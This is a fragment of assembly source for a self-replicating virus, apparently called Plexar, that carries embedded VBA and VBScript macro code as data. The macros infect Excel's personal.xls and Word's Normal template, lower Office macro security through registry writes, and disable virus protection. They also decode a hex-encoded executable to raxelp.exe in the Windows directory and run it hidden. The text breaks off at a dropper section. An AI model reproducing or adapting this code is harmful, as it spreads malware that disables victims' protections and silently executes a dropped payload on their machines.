Macaco DB 13d DUP (00h)
|
||
|
||
Virus_Macro LABEL NEAR
|
||
DB 'Attribute VB_Name = "Plexar"', 0Dh, 0Ah
|
||
DB 'Sub Auto_Open()', 0Dh, 0Ah
|
||
DB 'Application.OnSheetActivate = "InfXL"', 0Dh, 0Ah
|
||
DB 'End Sub', 0Dh, 0Ah
|
||
DB 'Sub InfXL()', 0Dh, 0Ah
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah
|
||
DB 'Set VBP = Application.VBE.ActiveVBProject', 0Dh, 0Ah
|
||
DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'Set VBX = VBP.VBComponents', 0Dh, 0Ah
|
||
DB 'With Application: .ScreenUpdating = Not -1: .DisplayStatusBar = Not -1: .EnableCancelKey = Not -1: .DisplayAlerts = Not -1: End With', 0Dh, 0Ah
|
||
DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$": YYY = Application.StartupPath & "\personal.xls"', 0Dh, 0Ah
|
||
DB 'VBX.Item(ZZZ).Export XXX', 0Dh, 0Ah
|
||
DB 'If AXO.Item(ZZZ).Name <> ZZZ Then', 0Dh, 0Ah
|
||
DB ' AXO.Import XXX: AWO.SaveAs AWO.FullName', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'If (Dir(YYY) = "") Then', 0Dh, 0Ah
|
||
DB 'Workbooks.Add.SaveAs YYY', 0Dh, 0Ah
|
||
DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah
|
||
DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'AXO.Import XXX', 0Dh, 0Ah
|
||
DB 'ActiveWindow.Visible = Not -1', 0Dh, 0Ah
|
||
DB 'Workbooks("personal.xls").Save', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'Kill XXX', 0Dh, 0Ah
|
||
DB 'Call Correme', 0Dh, 0Ah
|
||
DB 'End Sub', 0Dh, 0Ah
|
||
DB 'Sub AutoClose()', 0Dh, 0Ah
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$"', 0Dh, 0Ah
|
||
DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
||
DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
||
DB 'With Options: .VirusProtection = (2 * 4 + 4 / 6 - 2): .ConfirmConversions = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah
|
||
DB 'With Application: .DisplayStatusBar = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah
|
||
DB 'Set AKT = VBE.ActiveVBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'Set NOX = NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'Set DOX = ActiveDocument.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'AKT.Item(ZZZ).Export XXX', 0Dh, 0Ah
|
||
DB 'If (NOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah
|
||
DB 'NOX.Import XXX', 0Dh, 0Ah
|
||
DB 'NormalTemplate.Save', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'If (DOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah
|
||
DB 'DOX.Import XXX', 0Dh, 0Ah
|
||
DB 'ActiveDocument.SaveAs ActiveDocument.FullName', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'Kill XXX', 0Dh, 0Ah
|
||
DB 'Call Correme', 0Dh, 0Ah
|
||
DB 'End Sub', 0Dh, 0Ah
|
||
DB 'Private Sub Correme()', 0Dh, 0Ah
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'Dim joda as String', 0Dh, 0Ah
|
||
DB 'Dim X as String', 0Dh, 0Ah
|
||
DB 'joda = "'
|
||
L_Virus_Macro EQU $-Virus_Macro
|
||
|
||
Virus_Macro_2 LABEL NEAR
|
||
DB 'For o = 1 to Len(joda) Step 2', 0Dh, 0Ah
|
||
DB 'X = X + Chr("&h" + Mid(Joda, o, 2))', 0Dh, 0Ah
|
||
DB 'Next', 0Dh, 0Ah
|
||
DB 'raxname = Environ("windir") & "\raxelp.exe"', 0Dh, 0Ah
|
||
DB 'Open raxname For Binary As #1', 0Dh, 0Ah
|
||
DB 'Put #1, 1, X$', 0Dh, 0Ah
|
||
DB 'Close #1', 0Dh, 0Ah
|
||
DB 'xoxo = Shell(raxname, 0)', 0Dh, 0Ah
|
||
DB 'End Sub', 0Dh, 0Ah
|
||
L_Virus_Macro_2 EQU $-Virus_Macro_2
|
||
|
||
Nihil DB 00h
|
||
Memoria DD 00000000h
|
||
Raxelp_$$$ DB "c:\raxelp.$$$", 00h
|
||
Plxwrd_vbs DB "plxwrd.vbs", 00h
|
||
|
||
Macro_VBS LABEL NEAR
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'Set word = CreateObject("Word.Application")', 0Dh, 0Ah
|
||
DB 'If ( word <> "" ) Then', 0Dh, 0Ah
|
||
DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
||
DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
||
DB 'Set maca = word.Application.NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'If maca.Item("Plexar").Name <> "Plexar" Then', 0Dh, 0Ah
|
||
DB 'maca.Import "c:\raxelp.$$$"', 0Dh, 0Ah
|
||
DB 'word.Application.NormalTemplate.Save', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'Set fso = CreateObject("Scripting.FileSystemObject")', 0Dh, 0Ah
|
||
DB 'Set excel = CreateObject("Excel.Application")', 0Dh, 0Ah
|
||
DB 'If ( excel <> "" ) Then', 0Dh, 0Ah
|
||
DB 'yyy = excel.Application.StartupPath & "\personal.xls"', 0Dh, 0Ah
|
||
DB 'If (fso.FileExists(yyy) = False) Then', 0Dh, 0Ah
|
||
DB 'excel.WorkBooks.Add.SaveAs yyy', 0Dh, 0Ah
|
||
DB 'excel.Application.ActiveWorkbook.VBProject.VBComponents.Import "c:\raxelp.$$$"', 0Dh, 0Ah
|
||
DB 'excel.ActiveWindow.Visible = Not -1', 0Dh, 0Ah
|
||
DB 'excel.Workbooks("personal.xls").Save', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'excel.Application.Quit', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
Largo_MVBS EQU $-Macro_VBS
|
||
|
||
FHandle_DPE DD 00000000h
|
||
MHandle_DPE DD 00000000h
|
||
BaseMap_DPE DD 00000000h
|
||
|
||
DROPPER LABEL NEAR
|
||
|
||
DB |